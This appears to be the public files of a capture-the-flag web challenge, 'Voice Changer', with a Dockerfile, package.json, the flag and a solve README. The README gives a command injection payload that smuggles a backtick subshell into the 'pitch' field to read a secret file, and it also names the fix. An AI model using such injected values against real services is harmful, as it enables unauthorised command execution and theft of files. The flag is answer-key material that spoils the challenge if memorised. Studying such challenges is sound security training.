-------------------------------------------------------------------------------- /Web/Voice Changer/chal/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:18-alpine 2 | RUN apk update 3 | RUN apk add su-exec 4 | RUN apk upgrade su-exec 5 | RUN apk add ffmpeg su-exec 6 | # Create app directory 7 | WORKDIR /app 8 | 9 | # Copy flag (secret.txt) 10 | COPY secret.txt / 11 | 12 | # Install app dependencies 13 | # A wildcard is used to ensure both package.json AND package-lock.json are copied 14 | # where available (npm@5+) 15 | COPY src/package*.json ./ 16 | 17 | RUN mkdir upload 18 | RUN mkdir output 19 | # If you are building your code for production 20 | RUN npm i --only=production 21 | # Bundle app source 22 | COPY src/ . 23 | 24 | RUN adduser -D myuser 25 | RUN chmod -R 755 . 26 | RUN chmod -R 777 ./upload 27 | RUN chmod a+s ./upload 28 | RUN chmod -R 777 ./output 29 | RUN chmod a+s ./output 30 | 31 | 32 | USER myuser 33 | 34 | EXPOSE 3030:3030 35 | CMD ["node", "index.js"] 36 | -------------------------------------------------------------------------------- /Web/Voice Changer/chal/secret.txt: -------------------------------------------------------------------------------- 1 | uoftctf{Y0UR Pitch IS 70O H!9H} -------------------------------------------------------------------------------- /Web/Voice Changer/chal/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "os_command_injection", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1", 8 | "start": "node index.js", 9 | "dev": "nodemon index.js" 10 | }, 11 | "keywords": [], 12 | "author": "", 13 | "license": "ISC", 14 | "dependencies": { 15 | "connect-busboy": "^1.0.0", 16 | "express": "^4.18.2", 17 | "uuid": "^9.0.1" 18 | }, 19 | "devDependencies": { 20 | "nodemon": "^2.0.20" 21 | } 22 | } 23 | 
-------------------------------------------------------------------------------- /Web/Voice Changer/solve/README.md: -------------------------------------------------------------------------------- 1 | Issue a POST request (using a tool such as Postman) with any audio file, setting the value of `pitch` to `` `cd ..;cd ..;cat secret.txt` ``; this reveals the flag in the output.![img.png](img.png) 2 | This pitch value opens a subshell (using the \` syntax) which finds the flag. Note that to find the location of `secret.txt` you can inject commands like `ls`. That the backticks are evaluated at all implies the server builds a shell command line from `pitch` without validating it (the server source is not included here); accepting only a numeric pitch, or invoking the audio tool with an argument array instead of a shell, removes the injection. -------------------------------------------------------------------------------- /Web/Voice Changer/solve/flag: -------------------------------------------------------------------------------- 1 | uoftctf{Y0UR Pitch IS 70O H!9H} -------------------------------------------------------------------------------- /Web/Voice Changer/solve/img.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/UofTCTF/uoftctf-2024-chals-public/c3bba8a7f83f45d02bc13105a330d21aaf0bd679/Web/Voice Changer/solve/img.png --------------------------------------------------------------------------------